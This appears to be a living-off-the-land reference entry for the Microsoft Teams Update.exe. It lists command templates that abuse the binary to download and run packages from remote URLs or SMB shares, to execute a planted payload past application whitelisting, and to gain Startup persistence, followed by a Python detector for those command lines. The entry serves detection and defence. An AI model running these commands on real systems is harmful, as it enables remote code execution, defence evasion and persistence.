Update.exe
Binary that updates an installed NuGet/Squirrel package. Part of the Microsoft Teams installation.
AWL Bypass
Download and execute binary
Update.exe --update={REMOTEURL}
Update.exe contacts the given URL, looks for a RELEASES file, then downloads and installs the NuGet package. — MITRE: T1218 — Privileges: User
Download and execute binary
Update.exe --update={PATH_SMB:folder}
Update.exe goes to the given SMB path, looks for a RELEASES file, then downloads and installs the NuGet package via Samba (SMB). — MITRE: T1218 — Privileges: User
Download and execute binary
Update.exe --updateRollback={REMOTEURL}
Update.exe contacts the given URL, looks for a RELEASES file, then downloads and installs the NuGet package. — MITRE: T1218 — Privileges: User
Application Whitelisting Bypass
Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"
Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. — MITRE: T1218 — Privileges: User
Download and execute binary
Update.exe --updateRollback={PATH_SMB:folder}
Update.exe goes to the given SMB path, looks for a RELEASES file, then downloads and installs the NuGet package via Samba (SMB). — MITRE: T1218 — Privileges: User
Download
Download binary
Update.exe --download {REMOTEURL}
Update.exe contacts the given URL, looks for a RELEASES file and downloads the NuGet package. — MITRE: T1218 — Privileges: User
Execute
Download and execute binary
Update.exe --update={REMOTEURL}
Update.exe contacts the given URL, looks for a RELEASES file, then downloads and installs the NuGet package. — MITRE: T1218 — Privileges: User
Download and execute binary
Update.exe --update={PATH_SMB:folder}
Update.exe goes to the given SMB path, looks for a RELEASES file, then downloads and installs the NuGet package via Samba (SMB). — MITRE: T1218 — Privileges: User
Download and execute binary
Update.exe --updateRollback={REMOTEURL}
Update.exe contacts the given URL, looks for a RELEASES file, then downloads and installs the NuGet package. — MITRE: T1218 — Privileges: User
Download and execute binary
Update.exe --updateRollback={PATH_SMB:folder}
Update.exe goes to the given SMB path, looks for a RELEASES file, then downloads and installs the NuGet package via Samba (SMB). — MITRE: T1218 — Privileges: User
Execute binary
Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"
Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. — MITRE: T1218 — Privileges: User
Execute binary
Update.exe --createShortcut={PATH:.exe} -l=Startup
Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a shortcut to the specified executable in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". The payload will then run at every login of the user who ran the command. — MITRE: T1547 — Privileges: User
Execute binary
Update.exe --removeShortcut={PATH:.exe} -l=Startup
Run the command to remove the shortcut that the "--createShortcut" command described on this page created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory. — MITRE: T1070 — Privileges: User
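
Detection
Added example, not part of the original entry: a classifier for process-creation command lines that matches the Update.exe flags listed on this page and tags each finding with the MITRE ID the page gives for it. The sample command lines, host names, file names and the EXPECTED_START allowlist are constructed assumptions.

```python
import re

# Update.exe as the process image (bare name or the end of a quoted/unquoted path).
IMAGE = re.compile(r'(?:^|[\\/"])update\.exe"?(?=\s|$)', re.I)
# --flag=value, --flag value or --flag "quoted value"
FLAG = re.compile(r'--([A-Za-z-]+)(?:[= ]+("[^"]*"|[^\s"]+))?')
REMOTE = re.compile(r'^(?:https?://|\\\\)', re.I)      # URL or UNC (SMB) path
STARTUP = re.compile(r'-l[= ]+"?startup', re.I)        # shortcut location = Startup
# Assumption: the only target this environment expects --processStart to launch.
EXPECTED_START = {"teams.exe"}

def classify(cmdline):
    """Return a list of (MITRE id, reason) findings for one process command line."""
    image = IMAGE.search(cmdline)
    if not image:
        return []
    args = cmdline[image.end():]
    findings = []
    for name, value in FLAG.findall(args):
        name, value = name.lower(), value.strip('"')
        if name in ("update", "updaterollback", "download") and REMOTE.match(value):
            findings.append(("T1218", f"--{name} pulls a package from {value}"))
        elif name == "processstart" and value.lower() not in EXPECTED_START:
            findings.append(("T1218", f"--processStart launches unexpected {value}"))
        elif name == "createshortcut" and STARTUP.search(args):
            findings.append(("T1547", f"Startup shortcut created for {value}"))
        elif name == "removeshortcut" and STARTUP.search(args):
            findings.append(("T1070", f"Startup shortcut removed for {value}"))
    return findings

# Constructed sample command lines (hosts, users and file names are made up).
SAMPLES = [
    r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"',
    r'Update.exe --update=https://updates.example.test/pkg',
    r'Update.exe --updateRollback=\\fileserver.example.test\share\pkg',
    r'Update.exe --download https://updates.example.test/pkg',
    r'Update.exe --processStart helper.exe --process-start-args "-q"',
    r'Update.exe --createShortcut=helper.exe -l=Startup',
    r'Update.exe --removeShortcut=helper.exe -l=Startup',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or "no finding", "<-", line)
```

Feed it the command-line field from process-creation telemetry; the URL and UNC findings need tuning against the update sources that Squirrel-based applications in the environment legitimately use.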